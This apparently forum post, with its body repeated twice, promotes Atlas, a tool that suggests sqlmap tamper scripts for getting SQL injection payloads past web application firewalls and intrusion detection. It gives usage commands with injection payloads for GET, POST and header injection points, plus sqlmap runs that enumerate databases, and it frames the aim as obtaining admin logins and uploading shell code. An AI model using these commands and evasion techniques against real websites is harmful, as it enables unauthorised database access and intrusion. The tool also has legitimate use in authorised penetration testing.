Atlas | Quick SQLMap Tamper Suggester v1.0
Only sqlmap is well-known for its use in database exploitation or injection to obtain login admin or user targets in order to allow attackers to upload shell code to the target.
In 2023, if you ask me, will SQLMap still be working?
I can say that this vulnerability depends on the website code having an error or bug, making it vulnerable to attack DBS. Also, many hackers have found the WordPress plugin SQLi, which means it's still a popular attack method in the OWASP Top 10.
This tool will help you or guide you to recommend a way to bypass because many web apps today have firewalls to protect their DBS. It is not easy to inject or get DBS, but you can try this tool as well. I know it because many red teams or experts use it to help them inject or exploit DBS.
Atlas is an open source tool that can suggest sqlmap tampers to bypass WAF/IDS/IPS, the tool is based on returned status code.


python3 atlas.py (version python3+)
Example : python3 atlas.py --url --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v
injection point (with %%inject%%):
GET Method : python3 atlas.py --url --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v
POST Method : python3 atlas.py --url -m POST -D 'test=%%10%%' --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v
Headers Method :
python3 atlas.py --url -H 'User-Agent: mozilla/5.0%%inject%%' -H 'X-header: test' --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v
Tamper Concatenation : python3 atlas.py --url --payload="-1234 AND 4321=4321-- AAAA" --concat "equaltolike,htmlencode" --random-agent -v

get Tampers List :
python3 atlas.py -g (help)
Run SQLMap: python3 sqlmap.py -u ' ' --dbs --random-agent -v 3
Price_ASC') AND 8716=4837 AND ('yajr'='yajr is blocked by WAF/IDS/IPS, now trying with Atlas:

python3 atlas.py --url ' ' --payload="') AND 8716=4837 AND ('yajr'='yajr" --random-agent -v
At this point:
python3 sqlmap.py -u ' ' --dbs --random-agent -v 3 --tamper=versionedkeywords,...
Only sqlmap is well-known for its use in database exploitation or injection to obtain login admin or user targets in order to allow attackers to upload shell code to the target.
In 2023, if you ask me, will SQLMap still be working?
I can say that this vulnerability depends on the website code having an error or bug, making it vulnerable to attack DBS. Also, many hackers have found the WordPress plugin SQLi, which means it's still a popular attack method in the OWASP Top 10.
This tool will help you or guide you to recommend a way to bypass because many web apps today have firewalls to protect their DBS. It is not easy to inject or get DBS, but you can try this tool as well. I know it because many red teams or experts use it to help them inject or exploit DBS.
Atlas is an open source tool that can suggest sqlmap tampers to bypass WAF/IDS/IPS, the tool is based on returned status code.


python3 atlas.py (version python3+)
Example : python3 atlas.py --url --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v
injection point (with %%inject%%):
GET Method : python3 atlas.py --url --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v
POST Method : python3 atlas.py --url -m POST -D 'test=%%10%%' --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v
Headers Method :
python3 atlas.py --url -H 'User-Agent: mozilla/5.0%%inject%%' -H 'X-header: test' --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v
Tamper Concatenation : python3 atlas.py --url --payload="-1234 AND 4321=4321-- AAAA" --concat "equaltolike,htmlencode" --random-agent -v

get Tampers List :
python3 atlas.py -g (help)
Run SQLMap: python3 sqlmap.py -u ' ' --dbs --random-agent -v 3
Price_ASC') AND 8716=4837 AND ('yajr'='yajr is blocked by WAF/IDS/IPS, now trying with Atlas:

python3 atlas.py --url ' ' --payload="') AND 8716=4837 AND ('yajr'='yajr" --random-agent -v
At this point:
python3 sqlmap.py -u ' ' --dbs --random-agent -v 3 --tamper=versionedkeywords,...
Last edited: